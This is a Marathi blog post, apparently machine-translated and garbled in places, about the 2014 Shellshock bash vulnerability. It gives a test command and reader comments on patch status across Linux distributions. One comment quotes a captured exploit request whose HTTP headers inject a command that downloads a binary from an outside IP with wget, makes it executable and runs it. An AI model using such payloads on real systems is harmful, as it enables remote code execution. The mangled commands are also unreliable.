बॅश: नवीन असुरक्षितता आढळली (आणि निश्चित)

हे काही ब्लॉगवर जंगलातील अग्नीसारखे चालत आहे, मध्ये प्रकाशित झालेली एक कथा सुरक्षा ब्लॉग de लाल टोपी ग्लोबल व्हेरिएबल्सच्या गैरवापरामुळे बॅशमध्ये सापडलेल्या असुरक्षा विषयी मूळ बातमीनुसारः

“… बॅश शेलला कॉल करण्यापूर्वी तुम्ही विशिष्ट रचलेल्या मूल्यांसह पर्यावरण चल तयार करू शकता या असुरक्षामुळे होते. या व्हेरिएबल्समध्ये शेल सुरू होताच कार्यान्वित केलेला कोड असू शकतो. या विस्तृत चरांच्या नावावर काही फरक पडत नाही, केवळ त्यांची सामग्री. परिणामी, ही असुरक्षा बर्‍याच संदर्भात उघडकीस आली आहेउदाहरणार्थ,

  • फोर्स कॉमांड हे sshd कॉन्फिगरेशनमध्ये रिमोट वापरकर्त्यांसाठी मर्यादित आदेश अंमलबजावणी क्षमता प्रदान करण्यासाठी वापरले जाते. हा दोष हे टाळण्यासाठी आणि अनियंत्रित आदेश अंमलबजावणी प्रदान करण्यासाठी केला जाऊ शकतो. काही गीट आणि सबवर्जन अंमलबजावणी अशी प्रतिबंधित शेल वापरतात. ओपनएसएचचा नियमित वापर प्रभावित होत नाही कारण वापरकर्त्यांकडे आधीपासूनच कन्सोलवर प्रवेश आहे.
  • जर CGI स्क्रिप्ट बॅश किंवा स्पॅन सबबेलमध्ये दोन्ही लिहिले गेले असेल तर Mod_cgi किंवा mod_cgid चा वापर करून अपाचे सर्व्हरवर परिणाम होतो. पीएचपीमध्ये सिस्टीम / एक्झिक्ट शेल वापरत असल्यास अशा सुब्बलवेल्सचा वापर सी / मधील पॉपन, पायथन मधील ओएस.सिस्टम / ओएस.पेपेनद्वारे स्पष्टपणे केला जातो. (सीजीआय मोडमध्ये चालू असताना) आणि पर्लमध्ये ओपन / सिस्टम (जे कमांड स्ट्रिंगवर अवलंबून असते).
  • Mod_php सह चालविल्या जाणार्‍या PHP स्क्रिप्ट्स sublevels खेळल्या गेल्यावर परिणाम होत नाही.
  • संभाव्य दुर्भावनायुक्त सर्व्हरकडून घेतलेल्या मूल्यांसह, डीएचसीपी क्लायंट सिस्टम कॉन्फिगर करण्यासाठी शेल स्क्रिप्टची विनंती करतात. हे डीएचसीपी क्लाएंट मशीनवर सामान्यत: रूट म्हणून, अनियंत्रित आदेश चालवण्यास परवानगी देते.
  • एसईडी विशेषाधिकार असलेले विविध डिमन आणि प्रोग्राम्स वापरकर्त्याद्वारे प्रभावित / पर्यावरणीय चल मूल्यांसह शेल स्क्रिप्ट्स कार्यान्वित करू शकतात, जे अनियंत्रित आदेशांची अंमलबजावणी करण्यास परवानगी देतात.
  • शेलला हूक करणारे किंवा शेल स्क्रिप्ट चालविणारे कोणतेही अन्य अनुप्रयोग, इंटरप्रीटर म्हणून बॅश वापरण्यासारखे आहे. व्हेरिएबल्सची निर्यात न करणारी शेल स्क्रिप्ट्स या समस्येस असुरक्षित नसतात, जरी त्यांनी अविश्वासू सामग्रीवर प्रक्रिया केली आणि त्यात ती संचयित केली तरीही शेल व्हेरिएबल्स (डावे) आणि sublevels उघडतात.

... "

माझ्या बॅशवर परिणाम झाला आहे हे कसे कळेल?

हे दिल्यास, या असुरक्षिततेचा आपल्यावर परिणाम झाला आहे की नाही हे जाणून घेण्याचा एक सोपा मार्ग आहे. खरं तर, मी माझ्या अँटरगॉसवर चाचणी केली आणि मला काहीच अडचण नाही. आपल्याला टर्मिनल उघडावे लागेल.

env x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे.

जर हे असे बाहेर आले तर आम्हाला कोणतीही अडचण नाही:

env x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे" बॅश: चेतावणी: एक्स: फंक्शन डेफिनेशन प्रयत्न बॅशकडे दुर्लक्ष करणे: `x' साठी फंक्शन डेफिनेशन आयात करण्यात त्रुटी ही एक चाचणी आहे

जर निकाल वेगळा असेल तर त्यांनी पॅच आधीच लागू केला आहे की नाही हे पाहण्यासाठी आमच्या पसंतीच्या वितरणाची अद्यतने चॅनेल वापरू इच्छित असतील. तर तुला माहित आहे 😉

अद्यतनितः हे उबंटू 14:04 वापरुन सहकार्याकाचे आउटपुट आहे:

env x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे" असुरक्षित ही एक चाचणी आहे

जसे आपण पाहू शकता, आतापर्यंत हे असुरक्षित आहे.


आपली टिप्पणी द्या

आपला ई-मेल पत्ता प्रकाशित केला जाणार नाही. आवश्यक फील्ड चिन्हांकित केले आहेत *

*

*

  1. डेटा जबाबदार: मिगुएल Áन्गल गॅटन
  2. डेटाचा उद्देशः नियंत्रण स्पॅम, टिप्पणी व्यवस्थापन.
  3. कायदे: आपली संमती
  4. डेटा संप्रेषण: कायदेशीर बंधन वगळता डेटा तृतीय पक्षास कळविला जाणार नाही.
  5. डेटा संग्रहण: ओकेन्टस नेटवर्क (EU) द्वारा होस्ट केलेला डेटाबेस
  6. अधिकारः कोणत्याही वेळी आपण आपली माहिती मर्यादित, पुनर्प्राप्त आणि हटवू शकता.

  1.   गेर्सन म्हणाले

    माझ्याकडे 14.04 वरून कुबंटू 64 आहे आणि मला हे देखील मिळते:

    env x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे.
    असुरक्षित
    ही परीक्षा आहे

    मी आधीच अद्ययावत केले आहे, परंतु ते योग्य नाही. काय करायचं?

    1.    चैतन्यशील म्हणाले

      त्यांच्या अद्ययावत होण्याची प्रतीक्षा करा. आधीच ईओएस उदाहरणार्थ अद्यतनित .. 😀

    2.    जुआन म्हणाले

      किती विचित्र आहे, माझ्याकडे कुबंटू 14.04 देखील आहे

      $ env x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे.
      बॅश: चेतावणी: x: फंक्शन व्याख्या प्रयत्नांकडे दुर्लक्ष
      बॅश: `x 'साठी फंक्शन व्याख्या आयात करताना त्रुटी
      ही परीक्षा आहे

      1.    जुआन म्हणाले

        मी जोडतो की आज डाउनलोड केलेल्या "बॅश" पॅकेजची आवृत्ती ही आहेः
        4.3-7बुंटु १.१

        http://packages.ubuntu.com/trusty/bash

    3.    इलियोटाइम 3000 म्हणाले

      माझ्या बाबतीत कमांड देऊन ती मला टर्मिनलमध्ये देते.

      >

      असो, विनोद असा आहे की मी डेबियन व्हेझी अद्यतनित केले आणि यामुळेच मला त्रास झाला.

      1.    युकिटरू म्हणाले

        व्हेजी अजूनही बगच्या दुसर्‍या भागासाठी असुरक्षित आहे, किमान दुपारसाठी (यूटीसी -4: 30) अद्याप समस्या खाली आहेः /

  2.   पीटरचेको म्हणाले

    मी नुकतेच सत्यापित केले की आज सकाळी अद्यतन लागू केल्यावर स्लॅकवेअर, डेबियन किंवा सेंटोस या दोघांनाही संबंधित अपडेट मिळाल्यामुळे परिणाम होणार नाही.

    या वेळी उबंटू अजूनही असुरक्षित बनते काय? आणि मला सांगा की हे सुरक्षित आहे: डी.

    1.    जुआन म्हणाले

      परंतु आपण उबंटू अद्ययावत करण्याचा प्रयत्न केला आहे?
      आजच्या अद्यतनासह त्यांनी तेही निश्चित केले आहे.

      1.    पीटरचेको म्हणाले

        OK

    2.    रोबोट म्हणाले

      सुरक्षा तज्ञ 'बॅश' असुरक्षा बद्दल चेतावणी देतात, यामुळे हार्टेबल बगपेक्षा लिनक्स सॉफ्टवेअर वापरकर्त्यांसाठी अधिक धोका असू शकतो, जिथे 'हॅकर्स' सिस्टमचा पूर्ण ताबा घेण्यासाठी बाशमधील बगचे शोषण करू शकतात.
      रॅपिड cy च्या सायबरसुरिटी फर्मचे अभियांत्रिकी व्यवस्थापक, टॉड बियर्डस्ली यांनी चेतावणी दिली की दोष त्याच्या तीव्रतेसाठी 7 रेट केले गेले आहे, याचा याचा जास्तीत जास्त प्रभाव आहे आणि शोषणाच्या जटिलतेसाठी "कमी" रेट केले आहे. जे 'हॅकर' हल्ल्यांसाठी तुलनेने सोपे आहे. ही असुरक्षा वापरुन, हल्लेखोर संभाव्यत: ऑपरेटिंग सिस्टमचा ताबा घेऊ शकतात, गोपनीय माहितीमध्ये प्रवेश करू शकतात, बदल करु शकतात. ”बियर्डस्ले म्हणाले. ते म्हणाले, “बाश व्यापलेल्या ज्या कोणालाही सिस्टमवर ताबडतोब पॅच लागू करावा.”
      बाख होस्ट केलेले जुने टूल (जीएनयू) प्रस्तुत करते या असुरक्षा करण्यापूर्वी लिनक्स सॉफ्टवेअरला जीएनयूपासून मुक्त करणे आणि बीएसडी टूलसाठी बदल करणे अधिक सोयीचे होईल.

      पुनश्च: माझे अभिव्यक्ती स्वातंत्र्य सेन्सॉर करू नका, ... कोणाचा अपमान करू नका, ... मी हटवलेल्या मागील संदेशांप्रमाणे माझा संदेश हटवू नका !.

      1.    झेरिक्स म्हणाले

        अरे कृपया, हे जास्त करू नका. जे लोक बीएसडी वापरतात आणि जीएनयू, लिनक्स किंवा या प्रकल्पांमधून आलेल्या कोणत्याही गोष्टीचा तिरस्कार करतात अशा लोकांचा मी कसा तिरस्कार करतो.

      2.    पीटरचेको म्हणाले

        मी तुझ्याबरोबर आहे आणि या छिद्राच्या तीव्रतेबद्दल तू अगदी बरोबर आहेस.

      3.    डायजेपॅन म्हणाले

        ही सेन्सॉरशिप नव्हती, ती रिडंडंसी होती (जीनोम 3.14.१XNUMX पोस्टमध्ये आपणही अशीच टिप्पणी केली होती)

      4.    कर्मचारी म्हणाले

        «… आणि शोषणाच्या पूर्णतेसाठी 'कमी' रेट केले, म्हणजे हॅकरच्या हल्ल्यांसाठी हे तुलनेने सोपे आहे relatively

        विसंगती लक्षात घेण्यासारखी आहे का?
        अशक्तपणाचे शोषण कसे करावे आणि त्याच वेळी "निम्न" पातळीवरील जोखीम असू शकते कारण ते वापरणे इतके जटिल आहे?
        हा एक बग आहे जो मीटिंगच्या काही तासांतच सोडवला गेला होता आणि ह्रदयी माणसासारखे शोषण केल्याचा अहवाल नाही (अर्थात, यास एकमेकांना जाणून घेण्यास कमी वेळ आहे).
        वास्तविक जोखमीपेक्षा हे टॅबलाइड प्रेस आहे.

      5.    पीटरचेको म्हणाले

        @ स्टॅफ तुम्हाला महत्त्व देत नाही का? आता मला काय सांगशील?

        GET./.HTTP/1.0
        .उपयोगकर्ता / एजंट: धन्यवाद-रॉब
        .कुकी: ().:.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .होस्ट: ().:.:;.};. Wget.-O//tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .रिफर: ().::;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .सकारा :. * / *

        $ फाइल एनजीन्क्स
        एनजीएनएक्सः जीएनयू / लिनक्स २.32.१80386 साठी, एपीएलएफ bit२-बिट एलएसबी एक्झिक्युटेबल, इंटेल 1०2.6.18, आवृत्ती १ (एसवायएसव्ही), स्टॅटिकली लिंक्ड

        . md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        तुम्हाला काय माहित आहे काय ते थोडे धोकादायक काहीही नाही ...

      6.    युकिटरू म्हणाले

        परिस्थिती अगदी गंभीर आहे, परंतु तेथून म्हणायचे आहे की आपण बीएसडी पर्यायासाठी बॅश वापरणे थांबवावे, ते आधीपासूनच तितकेच आहे, तरीही अपडेट आधीपासूनच आहे, मी फक्त अपडेट्सला स्पर्श करतो आणि दुसरे काहीही नाही.

        आता पीडी, मला वाटते की हे आणखी एक सहकारी आहे @robet, मला असे वाटत नाही की येथे प्रशासक अशा प्रकारच्या टिप्पण्या हटविण्यास समर्पित आहेत कारण होय, मी या समुदायात भाग घेतल्यापासून मला ही भावना आली आहे आणि मला आशा आहे की हे असेच राहील.

        ग्रीटिंग्ज

      7.    चैतन्यशील म्हणाले

        आपण अचूक अशी टिप्पणी दोन भिन्न पोस्टवर टाकली. आपण कथेच्या "स्त्रोत" ची जाहिरात करण्याचा प्रयत्न करीत असल्यास, क्षमस्व, हे स्थान नाही.

      8.    मारियो म्हणाले

        बॅश युनिक्स (आणि त्याचा जीएनयू क्लोन) मधून आला आहे. ओएसएक्स सारख्या बीएसडी-आधारित प्रणालीवर देखील परिणाम झाला आहे आणि गेनबेटाच्या मते, त्यांनी अद्याप ते ठोकले नाही. त्याचप्रमाणे, बॅशमध्ये प्रवेश करण्यासाठी आपल्यास एकतर स्थानिक खाते किंवा एसएसएच मार्गे वापरकर्ता खाते आवश्यक आहे.

      9.    युकिटरू म्हणाले

        @कर्मचारी:

        1.- बगमुळे प्रभावित होणार्‍या सेवांच्या प्रमाणामुळे हे स्तर 10 (धोक्याच्या अधिकतम पातळी) म्हणून वर्गीकृत केले गेले आहे. मुख्य टीपमध्ये ते सत्य अगदी स्पष्ट करतात, असा युक्तिवाद करत की बग अपाचे, एसएसडी, सूड परवानगीसह प्रोग्राम (xorg, इतरांमधील) सारख्या सेवांवर परिणाम करू शकतो.

        २- हे अंमलबजावणीच्या बाबतीत कमी पातळीचे म्हणून वर्गीकृत केले जाते आणि @lav ने पोस्टमध्ये ठेवलेल्या असुरक्षा चाचणी स्क्रिप्टचे याचे उत्कृष्ट उदाहरण. अंमलबजावणी करणे फार कठीण नाही, जसे आपण पाहू शकता.

        मला माहितीमध्ये अनावश्यकपणा दिसत नाही (मला फक्त एक गूगल ट्रान्सलेशन दिसते) आणि जर समस्या अगदी गंभीर असेल आणि जसे आपण म्हणता, तसे आधीपासूनच एक पॅच आणि समाधान आहे, परंतु त्यासाठी नाही, तर यापुढे धोका नाही आणि अगदी वास्तविक .

      10.    कर्मचारी म्हणाले

        @petercheco / @ युकिटरू

        माझा चुकीचा अर्थ लावू नका, मला असे वाटते की माझी टीका ही बातमी आहे की रोबेट दुवा साधतात आणि विसंगतीवर केंद्रित आहेत आणि अनावश्यकपणावर नाही.

        त्याचप्रकारे, आपण जोखीम आणि धोक्यात फरक करणे आवश्यक आहे (मी नंतरचा उल्लेख करत नाही), आम्ही सामान्यत: समानार्थी शब्द म्हणून त्यांचा वापर करतो, परंतु येथे, धोका म्हणजे बगची नुकसान क्षमता असेल आणि त्याच्या घटनेची संभाव्यता धोक्यात येईल.
        माझ्या विशिष्ट बाबतीत मी कालपासून प्रवेश केला. ते मेलिंग याद्या किंवा त्यासारख्या कशासाठीही नव्हते. ते एका डेस्कटॉप डिस्ट्रोसाठी होते! मी फोन उचलला आणि लिंकसह सिसाडमीनला निरोप पाठविला आणि मी पुष्टी केली की माझ्याकडे सर्व काही पॅच आहे, नंतर मला माफ करा परंतु या बातम्यांमुळे मला जागृत राहता येत नाही.

      11.    रोबोट म्हणाले

        इतर मंचांमध्ये ते बॅशच्या असुरक्षाबद्दल "डेबियन आणि उबंटूने सोडविलेले समाधान" नमूद करतात, परंतु आज त्यांना आढळले की एक असुरक्षितता अद्याप अस्तित्त्वात आहे, म्हणूनच तो समाधान अपूर्ण होता, त्यांनी ते नमूद केले!

        मी पाहतो की लोकांना धोक्याच्या तीव्रतेपासून रोखण्याच्या सोप्या वस्तुस्थितीवर-माझ्यासाठी जास्तीत जास्त धोक्याच्या पातळी 10 सह पात्रतेबद्दल टीका केली गेली आहे, आणि बाश होस्ट केलेल्या कालबाह्य जीएनयू उपकरणाच्या तोंडावर लिनक्स सॉफ्टवेअरच्या संभाव्य उपायांचा उल्लेख केला आहे - लिनक्स सॉफ्टवेअरमधील बीएनडी टूलसह जीएनयू बदलता येऊ शकेल, मी लिनक्स वापरतो आणि मला लिनक्स आवडतो!

        मी स्पष्ट करतो की बॅश बीएसडी मध्ये डीफॉल्ट स्थापित केलेला नाही, ते बीएसडी मध्ये स्थापित केले जाणारे आणखी एक लिनक्स सहत्वता पॅकेज आहे ... होय! आणि स्त्रोत ठेवण्यात आला आहे जेणेकरून ते बातम्या तपासू शकतील, कारण बर्‍याच वापरकर्त्यांचा संदेश किंवा टिप्पणीवर विश्वास नाही.

        1.    चैतन्यशील म्हणाले

          रोबेट: जसे की त्यांनी आपल्याला वारंवार पुन्हा सांगितले आहे, आपण पोस्टमध्ये आपली बातमी आधीच टिप्पणी दिली आहे, आपण टिप्पणी केलेल्या प्रत्येक पोस्टमध्ये ती ठेवण्याची गरज नाही.

          बॅशवर, अशी इतर कवच आहेत जी बाश असुरक्षित असल्यास वापरली जाऊ शकतात. 😉

      12.    मारियो म्हणाले

        रोबेट, मला माहित आहे की लिनक्स कर्नलला बीएसडी युजरलँडसह जोडणारे कोणतेही सॉफ्टवेअर नाही. सर्वात जवळची गोष्ट म्हणजे, गेन्टू आणि डेबियन डू सारख्या, केबीएसडी + जीएनयू. त्याशिवाय बीएसडी (१ 1983 is1977) नंतर जीएनयू (१ XNUMX XNUMX) म्हटलं जाऊ शकत नाही. ते दोघेही त्यांची युनिक्स रूट (परंतु कोड नाहीत) सामायिक करतात, लिनस टी लहान असताना बाश तयार झाला असेल तर "लिनक्स अनुकूलता" नसते.

  3.   मॅन्युएलपेरेझफ म्हणाले

    ओफ, यावेळी डीबियन चाचणी आमच्याकडे किती लहरी आहे "असुरक्षित" आहे ...

    1.    श्रीमती म्हणाले

      मी डेबियन चाचणी वापरतो आणि या शाखेत आम्हाला बॅश अपडेट देखील प्राप्त झाला आहे

  4.   डायजेपॅन म्हणाले

    जेनबेटाच्या मते आणखी एक असुरक्षितता देखील आहे
    http://seclists.org/oss-sec/2014/q3/685

    सल्लामसलत करण्याची आज्ञा आहे
    env X = '() {(a) => sh' sh -c "इको असुरक्षित"; बॅश-सी "प्रतिध्वनी अयशस्वी 2 अप्रत्याशित"

    1.    चैतन्यशील म्हणाले
      env X = '() {(a) => sh' sh -c "इको असुरक्षित"; बॅश-सी "इको अनपेस्टेड फेल्योर 2" श: एक्स: लाइन 1: अनपेक्षित घटकाजवळ सिंटॅक्टिक एरर `= 'श: एक्स: लाइन 1:`' श: `एक्स 'शसाठी फंक्शन परिभाषा आयात करताना त्रुटी - असुरक्षित - अयशस्वी 2 अप्रत्याशित आज्ञा आढळली नाही
      
      1.    डायजेपॅन म्हणाले

        त्याच मी.

      2.    गिसकार्ड म्हणाले

        इथेही. परंतु पोस्टमधील मूळ बग (एल) उबंटू 14.04 मध्ये पॅच केला होता

      3.    x11tete11x म्हणाले

        साधे प्रतिध्वनी करण्याऐवजी, त्यास विशेषाधिकारांची आवश्यकता असलेल्या सूचनांची अंमलबजावणी करण्याचा प्रयत्न करा, मी "अपुरा परवानग्या" टाकतो ... हा बग विशेषाधिकार वाढवित नाही?

      4.    एक्सर्क्सो म्हणाले

        तू बरोबर आहेस !! त्या दोन असुरक्षा होत्या ...

        माझ्यासाठी लिनक्स मिंट 17 मध्ये त्यांनी उबंटू रिपॉझिटरीजमध्ये काल रात्री केलेल्या दुसर्‍या बॅश अपडेटनंतर, शेल हे आऊटपुट ऑफर करते.

        env X = '() {(a) => sh' sh -c "इको असुरक्षित"; बॅश-सी "इको फेल 2 अनपेचेड"
        >

        आधीची अद्यतने करण्यासाठी उबंटू रिपॉझिटरीजमध्ये ठेवलेली "बाश" ची आवृत्ती अशीः

        4.3-7बुंटु १.१

        डेबियन व्युत्पन्न प्रणालीवर आपण या आदेशासह स्थापित आवृत्ती तपासू शकता:

        dpkg -s बॅश | ग्रेप आवृत्ती

        असं असलं तरी, ते कमीतकमी डेबियन, उबंटू आणि पुदीना वापरकर्त्यांसाठी स्पष्ट केले पाहिजे; आपण #! / बिन / श हेडरसह स्क्रिप्ट चालवणा programs्या प्रोग्राम्सबद्दल अधिक काळजी घेऊ नका कारण त्या वितरणांवर / बिन / श "बॅश" म्हणत नाहीत, परंतु शेलला "डॅश" (डॅश आहे :)शी बांधतात.

        डेबियन अल्केमिस्ट कन्सोल (डॅश) एक व्युत्पन्न पॉसीएक्स कन्सोल आहे
        राख.
        .
        हे बॅशपेक्षा वेगवान स्क्रिप्ट्स कार्यान्वित करत असल्याने आणि कमी निर्भरता आहे
        लायब्ररी (सॉफ्टवेअर अयशस्वी होण्याविरूद्ध ते अधिक मजबूत बनविते किंवा
        हार्डवेअर), ते सिस्टमवरील डीफॉल्ट सिस्टम कन्सोल म्हणून वापरले जाते
        डेबियन

        तर, किमान उबंटूमध्ये, "बॅश" चा उपयोग वापरकर्त्याच्या लॉगिनसाठी शेल म्हणून केला जातो (मूळ वापरकर्त्यासाठी देखील). परंतु कोणताही वापरकर्ता पूर्वनिर्धारितपणे वापरकर्ता आणि रूट कन्सोल (टर्मिनल्स) साठी दुसरा शेल वापरू शकतो.

        हे कमांड कार्यान्वित करून शेल स्क्रिप्ट्स (#! / Bin / sh) कार्यान्वित करते हे तपासणे सोपे आहे:

        फाईल / बिन / श
        (आउटपुट / बिन / श: प्रतीकात्मक दुवा 'डॅश' शी आहे) आम्ही पुनरावृत्ती करत असलेल्या ट्रेसचे अनुसरण करतो

        फाईल / बिन / डॅश
        (आउटपुट / बिन / डॅश आहे: ईएलएफ 64-बिट एलएसबी शेअर्ड ऑब्जेक्ट, x86-64, आवृत्ती 1 (एसवायएसव्ही) त्यामुळे हे एक्झिक्युटेबल आहे.

        लिनक्स मिंट 17 वितरणावर हे परिणाम आहेत इतर उबंटू / डेबियन-आधारित वितरणांवर ते भिन्न असू शकतात.

        डीफॉल्ट शेल बदलणे अवघड नाही !! आपण वापरकर्त्यांसाठी आणि मूळ वापरकर्त्यासाठी भिन्न वापरु शकता. वास्तविक, आपल्याला फक्त आपल्या आवडीचे शेल स्थापित करावे लागेल आणि "chsh" आदेशासह किंवा / etc / passwd फाईलमध्ये संपादन करून डीफॉल्ट बदलावे लागेल ("पासडब्ल्यूडी" फाइल संपादित करताना त्रुटीचे परिणाम माहित नसलेले वापरकर्ते असले तरी हे आहे हे चांगले आहे की त्यांनी स्वत: ला खूप चांगल्या प्रकारे माहिती दिली आणि संपादन करण्यापूर्वी, ते पुनर्प्राप्त करणे आवश्यक असल्यास मूळची एक प्रत बनवा).

        मी "टीसीएसटी" सह अधिक सोयीस्कर वाटत आहे (टीसीएसटी आहे :)

        टेन्नेक्स सी कन्सोल, बर्कले csh ची सुधारित आवृत्ती

        काही वर्षापूर्वी मॅक ओएस एक्सने "सीएसई" वापरला होता. Appleपलची बरीच ऑपरेटिंग सिस्टम फ्रीबीएसडी कोड आहे याचा विचार करता तार्किक काहीतरी. काल मी जे वाचले त्यावरून असे दिसते की ते वापरकर्त्याच्या टर्मिनल्ससाठी "बॅश" देखील प्रदान करतात.

        निष्कर्ष:

        - पॅच केलेल्या "बॅश" आवृत्त्या "सर्वाधिक वापरल्या जाणार्‍या वितरणांसाठी" आधीपासूनच वितरित केल्या गेल्या आहेत
        - "बॅश" आवृत्ती 4.3-7ubuntu1.2 आणि नंतरमध्ये हे बग नसलेले आहेत
        ओएस * लिनक्समध्ये "बॅश" वापरणे बंधनकारक नाही
        - काही * लिनक्स वितरण दुवा #! / बिन / श "बॅश" सह
        - तेथे पर्याय आहेत: राख, डॅश, सीएसटी, टीसीएस आणि काही अधिक
        - टर्मिनल उघडताना सिस्टमने कॉल केलेले डीफॉल्ट शेल बदलणे जटिल नाही
        - काही लहान उपकरणे (राउटर आणि इतर) "बॅश" वापरतात, कारण ती खूप मोठी आहे !!

      5.    एक्सर्क्सो म्हणाले

        आत्ताच आणखी एक अद्यतन आले आहे जे "बॅश" 4.3-7ubuntu1.3 ची दुसरी आवृत्ती स्थापित करते

        लिनक्स मिंट 17 आणि उबंटू 14.04.1 एलटीएस साठी

        1.    चैतन्यशील म्हणाले

          आर्कलिनक्सने बॅश -4.3.026-1 मध्ये आवृत्ती प्रविष्ट केली

    2.    रोबोट म्हणाले

      @ झुरक्सो… .बर्कले कडून आला??… मी वर काय बोललो याबद्दल तुला काही माहिती आहे, आणि बीएसडी “csh” वापरणे चांगले आहे… जिथे बाश होस्ट केलेले आहे त्या जुन्या जीएनयू साधनपेक्षा. हे साधन लिनक्स सॉफ्टवेअरसाठी सर्वोत्कृष्ट आहे.

  5.   नाममात्र म्हणाले

    मला वाटते की हे बग आहे

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    खरे?

  6.   गोन्झालो म्हणाले

    आणि यावर उपाय काय असेल?

    1.    चैतन्यशील म्हणाले

      आपल्या डिस्ट्रो the वर पॅकेज अद्यतनित करण्यासाठी त्यांच्यासाठी प्रतीक्षा करा

  7.   डायजेपॅन म्हणाले

    बगने शेलशॉक म्हणून बाप्तिस्मा घेतला
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   पाब्लो इव्हान कोरिया म्हणाले

    असुरक्षित
    ही परीक्षा आहे

    उबंटू स्टुडिओ 14.04 साठी अद्याप कोणताही पॅच नाही

    1.    बुडवणे म्हणाले

      उबंटू स्टुडिओ 14.04.1 मध्ये दुरुस्त
      विस्पी @ उबंटस्ट्युडिओ: ~ $ एनव्ही एक्स = '() {:;}; इको असुरक्षित 'बॅश-सी "इको ही चाचणी आहे.
      बॅश: चेतावणी: x: फंक्शन व्याख्या प्रयत्नांकडे दुर्लक्ष
      बॅश: `x 'साठी फंक्शन व्याख्या आयात करताना त्रुटी
      ही परीक्षा आहे

  9.   रोडर म्हणाले

    खरं तर ही एक छोटी असुरक्षितता आहे, जर त्याचा तुमच्यावर परिणाम झाला तर असे आहे की आपण यापूर्वी काहीतरी चुकीचे करीत होते ...

    कारण रूट परवानगीसह चालणारी बॅश स्क्रिप्ट वापरकर्त्यास कधीही उघड केली जाऊ नये. आणि जर तो कोणत्याही विशेषाधिकारांशिवाय धावतो, तर अशी कोणतीही धमकी दिली जात नाही. वास्तविक, हे मूर्खपणाचे आहे. खूप भितीदायक.

    1.    झेरिक्स म्हणाले

      मी सुद्धा हाच विचार केला.

    2.    कर्मचारी म्हणाले

      तंतोतंत, अधिक वर्तमानपत्रे विकण्यासाठी किंवा अधिक भेटी मिळविण्यासाठी, हे बग चांगले आहेत.
      परंतु हे नेहमी नमूद करणे विसरतात की संगणकास या प्रकारच्या स्क्रिप्टसह तडजोड करण्यासाठी आपल्याकडे प्रथम बॅशमध्ये प्रवेश असणे आवश्यक आहे आणि नंतर ते मूळ म्हणूनच असणे आवश्यक आहे.

      1.    दरियो म्हणाले

        स्टाफ जर आपण अपाचे वापरत असल्यास सीजी, कुकीज म्हणून फक्त http हेडर्समध्ये ठेवले किंवा आपण कार्यान्वित करू इच्छित फंक्शनचा संदर्भ घ्या. हे अगदी जंत पसरविण्यासाठी देखील वापरले गेले आहे.

    3.    दरियो म्हणाले

      आणि जर कोणी एखाद्या सर्व्हरवर wge mishell.php सह शेल ठेवतो, त्या प्रकरणात ते गंभीर नाही, आहे ना?

    4.    इलियोटाइम 3000 म्हणाले

      आपल्याशी सहमत आहे. मला वाटले की हा हार्दलीड मधील एक मोठा बग आहे (अगदी एनएसएने स्वत: ला विकृती आणण्यासाठी कर्ज दिले होते) पण तरीही ही किरकोळ बग होती.

      इतर खरोखर गंभीर बग्स आहेत जसे की फ्लॅशचा वेडा वापर आणि पेपर फ्लॅश प्लेयरमधील कामगिरी ड्रॉप, आणि एक आधीच निराकरण केली गेली आहे क्रोम आणि फायरफॉक्समध्ये वेबआरटीसी बग.

  10.   बिंडरमॅन म्हणाले

    आपल्यास माहित आहे काय की लिनक्स मिंट 16 असलेल्या लोकांसाठी याची व्यवस्था आहे का?

  11.   ऑस्कर म्हणाले

    डेबियन चाचणीमध्ये ते आधीच निश्चित केले गेले होते.

  12.   योयो म्हणाले

    माझ्या 5 डिस्ट्रॉजमध्ये हे निराकरण झाले आहे, माझ्या ओएस एक्समध्ये मला माहित नाही.

    कृपया माझी टिप्पणी सेन्सॉर करू नका, मी ओएस एक्स म्हणालो. आपण या साइटवर ओएस एक्स म्हणू शकता की नाही हे मला माहित नाही.

    1.    tannhauser म्हणाले

      @ Yoyo हे जास्त प्रमाणात दाखवू नका की ते अजूनही पॅचच्या काही तपशीलांवर काम करत आहेत ... हे करून पहा आणि नंतर मला सांगा, एक्सडी चाला

      env x = '() {:;}; इको असुरक्षित 'बॅश-सी "इको मी आयफोन 6 कचर्‍यापेक्षा अधिक असुरक्षित आहे"

      ते जर ओएस एक्सपूर्वी 100% सोडवले असेल तर मी काहीही पण लावतो

    2.    इलियोटाइम 3000 म्हणाले

      बरं, आर्स टेक्निकामध्येही ते ओएसएक्समधील बॅशला प्रासंगिकता देतात.

    3.    चैतन्यशील म्हणाले

      @ योयो पुढील स्पॅम ओएस एक्स वर टिप्पणी .. lla tu save .. 😛

  13.   tannhauser म्हणाले

    @yoyo तेथे कोट्स निराकरण करण्यासाठी ... परंतु उर्वरित आपल्‍याला माहित आहे 😉

    1.    इलियोटाइम 3000 म्हणाले

      जसे ते ओएसएक्सचे संरक्षक बनले आहेत (कारण ओएसएक्स अजूनही बाश: व्ही वापरते)

      असं असलं तरी मला डेबियन जेसीबरोबर इतका गडबड नको आहे.

  14.   elhui2 म्हणाले

    सिस्टम ओएस वर असुरक्षित असल्यास:
    आपण सर्व स्वच्छ करा आणि & यम अद्यतन बॅश

    बॅश आवृत्ती पाहण्यासाठी:
    rpm -Qa | ग्रीप बॅश

    जर आवृत्ती बॅश-4.1.2..१.२-१ !.el15_6 पूर्वीची असेल तर तुमची सिस्टम असुरक्षित असू शकते!

    ग्रीटिंग्ज

  15.   मॅन्युएलपेरेझफ म्हणाले

    2 रा असुरक्षा अद्याप निराकरण झालेली नाही

